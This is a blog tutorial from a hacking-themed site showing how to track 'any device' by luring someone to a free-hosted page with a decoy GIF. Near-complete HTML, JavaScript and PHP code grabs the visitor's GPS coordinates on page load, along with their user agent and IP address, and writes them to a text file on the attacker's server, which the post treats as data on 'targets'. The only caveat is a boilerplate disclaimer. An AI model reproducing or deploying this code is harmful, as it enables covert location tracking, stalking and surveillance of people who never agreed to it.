Close Menu
    What's Hot

    Why GRC Services Are Vital for Business Growth and Compliance in 2025

    July 1, 2025

    Ultimate Guide to Attack Surface Scanning

    April 10, 2025

    Recent Trends in Zero Trust Architecture

    March 3, 2025
    Facebook X (Twitter) Instagram LinkedIn WhatsApp
    HITH Blog – HackerinthehouseHITH Blog – Hackerinthehouse
    • Bug Bounty

      A Beginner’s guide to Active Directory Penetration Testing

      June 21, 2023

      Building an XSS Scanner with Python

      February 27, 2023

      Journey to Website Security: Uncovering Hyperlink Injection Dangers

      February 24, 2023

      File Upload XSS | Find XSS in a different way while doing Bug bounty and Pentesting

      January 13, 2023

      How To Find DOM-based XSS Vulnerability

      December 27, 2022
    • Pen Testing

      Privileged Escalation: How Hackers Exploit Permissions to Compromise Your Systems

      March 5, 2024

      The Ultimate Guide to Vulnerability Scanning

      December 13, 2023

      Top 10 Tools for Real World Red Teaming

      November 18, 2023

      Locking Down OAuth 2.0: Critical Steps to Protect User Accounts and Data

      November 10, 2023

      Detailed guide on Password Transmutations

      April 29, 2023
    • Cyber Security

      Why GRC Services Are Vital for Business Growth and Compliance in 2025

      July 1, 2025

      Ultimate Guide to Attack Surface Scanning

      April 10, 2025

      Recent Trends in Zero Trust Architecture

      March 3, 2025

      Modern Defensive Cybersecurity Services

      December 29, 2024

      A Comprehensive Guide on Cyber Security Services VS Cyber Security Products

      June 14, 2024
    • Services
    • Product
      • Certifications
    • More
      1. Ethical Hacking
      2. Kali Linux
      3. Write Ups
      4. CTF
      5. Blockchain
      6. Machine Learning
      7. Computer Science
      8. View All

      Journey to Website Security: Uncovering Hyperlink Injection Dangers

      February 24, 2023

      Pentest/VAPT RoE and Best Practices

      February 3, 2023

      Emoji Deploy Attack Chain

      January 24, 2023

      Introduction to Information Security

      January 11, 2023

      Cyber Security Roadmap (Part-2)

      October 25, 2022

      How to install waybacksurls in kali linux (2022)

      September 23, 2022

      How To Find Hidden Parameters

      November 12, 2022

      Top 10 Subdomain Takeover Reports

      November 6, 2022

      Pause DeSync Attack :

      November 3, 2022

      Bypassing OTP Verification Methods

      October 31, 2022

      Tryhackme Vulnversity walkthrough

      September 26, 2022

      Why GRC Services Are Vital for Business Growth and Compliance in 2025

      July 1, 2025

      Ultimate Guide to Attack Surface Scanning

      April 10, 2025

      Recent Trends in Zero Trust Architecture

      March 3, 2025

      Modern Defensive Cybersecurity Services

      December 29, 2024

      A Peek into Facial Recognition Technology

      August 21, 2023

      How Data Scientists and Machine Learning Engineers Differs

      November 8, 2022

      Artificial Neural Networks with ML

      November 4, 2022

      INTRODUCTION TO MACHINE LEARNING

      October 20, 2022

      Robotic Process Automation: The Key to Effortless Efficiency

      September 18, 2024

      BCI: Merging Minds With Machines

      August 18, 2023

      Is Quantum Computing the future of Computing?

      August 16, 2023

      Why GRC Services Are Vital for Business Growth and Compliance in 2025

      July 1, 2025

      Ultimate Guide to Attack Surface Scanning

      April 10, 2025

      Recent Trends in Zero Trust Architecture

      March 3, 2025

      Modern Defensive Cybersecurity Services

      December 29, 2024
    HITH Blog – HackerinthehouseHITH Blog – Hackerinthehouse
    Home»Cyber Security»How to Track Any Devices On Internet
    Cyber Security

    How to Track Any Devices On Internet

    By KRiPPto99December 24, 2022Updated:December 24, 2022No Comments5 Mins Read
    Share Facebook Twitter Pinterest LinkedIn Tumblr Reddit Telegram Email
    Share
    Facebook Twitter LinkedIn Pinterest Email

    Intruduction

    Hello!!!!!!!!!!!!!!!!!! everyone! It’s KRiPPto99 Back again I hope you all doing very well. Today in the blog we are going to something new Well! it’s nice to learn new every day right, so let me quickly get into the topic, let’s Learn How to track phones and computers. Let’s try To find the precious location of devices like smartphones, laptops, and iPad by sending them links In This Blog I am going to show you manually How can we do this anyone!!

     

    Requisites:

    Knowledge of basics html and JavaScript

    Step1: create a html page

    here!!! we required a hosting service to host our site so am using here https://in.000webhost.com/ which is free now, we need create html template you can take do several things you can add images, videos, gifs, are any personal site, here what I am doing is to show you people is take any of your choice gifs and embed it copy to your notepad like below in image I did

     

     

    Step 2: Quickly setup your account in 000webhost.in For further process

    Now after setting up your site go to manage website after landing on manage website page it looks like this below image

    Now in above right side of panel click on add file and name it as index.html and create a file to add code(the one which we earlier copied of gifs ) in below image I showed how to do this, Just like below images i copied code and pasted it in Index.html page that’s all in step 2

     

     

     

    Step 3: Lets Add Tracking Code

    Now in step3 we are going to add JavaScript code in index.html page to get location its about GPS so its location very accuracy add below code in index.html file

    <!DOCTYPE html>
    <html>
    <body onload="getLocation()">
    
    <iframe src="https://giphy.com/embed/TjAcxImn74uoDYVxFl" width="480" height="480" frameBorder="0" class="giphy-embed" allowFullScreen></iframe><p><a href="https://giphy.com/gifs/fcbarcelona-goat-messi-leo-TjAcxImn74uoDYVxFl">via GIPHY</a></p>
    
    <p id="demo"></p>
    
    <script>
    var x = document.getElementById("demo");
    
    function getLocation() {
    if (navigator.geolocation) {
    navigator.geolocation.getCurrentPosition(showPosition);
    } else { 
    x.innerHTML = "Geolocation is not supported by this browser.";
    }
    }
    
    function showPosition(position) {
    x.innerHTML = "Latitude: " + position.coords.latitude + 
    "<br>Longitude: " + position.coords.longitude;
    }
    </script>
    
    </body>
    </html>

    Here in code if we observe I added that gifs code in body and added onload=”getLocation()” in body tag so whenever user opens the site we get location coordinates  user doesn’t need to click on something in below images i shown you guys how i did and how its looks after adding code and when we visit the site its looks like this, yes that messi picture

     

     

     

     

    Step 4: Now Its Time Store GPS Location

    As we did in step2, here we need to open file of  index.html and here we are going to add a functionality to send request to server we are going to add AJAX-XMLHttpRequest here add below code in

     

    function showPosition(position) {
    const xhttp = new XMLHttpRequest();
    xhttp.open("GET", "store.php?lat=" + position.coords.latitude + "&long=" + position.coords.longitude);
    xhttp.send();
    }

    in function we are storing data in store.php file we the data which are going to get is on form of latitude and longitude by a simple GET Request and I am adding pictures how its going to look after adding code and the response of our index file now if we observe we hides that latitude and longitude which is seen in earlier site, when we visits the site its looks something like this

     

     

    Step 5: Creating PHP File

    Now lets quickly create php file in name store.php which we earlier linked in showPosition function and after creating file add below code which results to get request to get location in terms of location.txt where we get our coordinates, basically we created PHP file to get our coordinates in format of txt file location.txt file now save and close the index.html file and visit the site take wait for 1 sec and come back to server and hit on refresh and open location.txt file now we get our coordinates in in location.txt file

    <?php
    $myfile = fopen("location.txt", "w");
    $txt = "lat:" . $_GET["lat"] . "\nlong: " . $_GET["long"];
    fwrite($myfile, $txt);
    fclose($myfile);
    
    ?>

     

     

    Step 6: Finding Targets Of Ips And Operating Systems 

    What we need to do changes is in index.html file open it and in function of showPosition add “&long=” + position.coords.longitude + “&uagent=” + navigator.userAgent); uagent is for to know which operating system we are using just like below, now save and close, visits the site come back again to server hit refresh check in location.txt file, here we go!!!

     

    function showPosition(position) {
    const xhttp = new XMLHttpRequest();
    xhttp.open("GET", "store.php?lat=" + position.coords.latitude + "&long=" + position.coords.longitude + "&long=" + position.coords.longitude + "&uagent=" + navigator.userAgent);
    xhttp.send();
    }
    

     

    And Now open store.php file to add code to get iplocation and info about the target

    . "\nIP: " .$_SERVER["REMOTE_ADDR"] . "\nUser agent:" . $_GET["uagent"] 
    
    
    
    

    The code and response will be looks like this below images

     

     

     

     

    Thats it now we get to know about finding location,ips,os to plot the coordinates just try on google they are several sites where you can plot the location well go for https://www.gps-coordinates.net/gps-coordinates-converter

     

    Disclaimer: Hackerinthehouse, it’s author, it’s affiliates and the developer of this tool won’t be responsible for any actions made by you. This article is just published for security research and education purposes only and we have tested it in a controlled simulated environment. It is the end user’s responsibility to obey all applicable local, state and federal laws.

     

    Thank you for reading this and have a nice stay there! 

    Author

    • KRiPPto99

      View all posts

    Cyber-Security How to track phones and computers Information Security infosec
    Share. Facebook Twitter Pinterest LinkedIn Tumblr Email
    Previous ArticleIdentity Security
    Next Article How To Find DOM-based XSS Vulnerability
    KRiPPto99

    Related Posts

    Cyber Security

    Why GRC Services Are Vital for Business Growth and Compliance in 2025

    July 1, 2025
    Cyber Security

    Ultimate Guide to Attack Surface Scanning

    April 10, 2025
    Cyber Security

    Recent Trends in Zero Trust Architecture

    March 3, 2025
    Add A Comment
    Leave A Reply Cancel Reply

    Advertisement
    Top Posts

    How to install waybacksurls in kali linux (2022)

    September 23, 20222,606 Views

    File Upload XSS | Find XSS in a different way while doing Bug bounty and Pentesting

    January 13, 2023913 Views

    OSCP Cheat Sheet

    October 16, 2022864 Views
    Stay In Touch
    • Facebook
    • YouTube
    • TikTok
    • WhatsApp
    • Twitter
    • Instagram
    Latest Reviews

    Subscribe to Updates

    Get the latest tech news from FooBar about tech, design and biz.

    Advertisement
    X (Twitter) Instagram LinkedIn WhatsApp Telegram
    • About us
    • Contact Us
    • Privacy Policy
    • Terms
    © 2025 HITH Blog. Powered by Hackerinthehouse.

    Type above and press Enter to search. Press Esc to cancel.

    Ad Blocker Enabled!
    Ad Blocker Enabled!
    Our website is made possible by displaying online advertisements to our visitors. Please support us by disabling your Ad Blocker.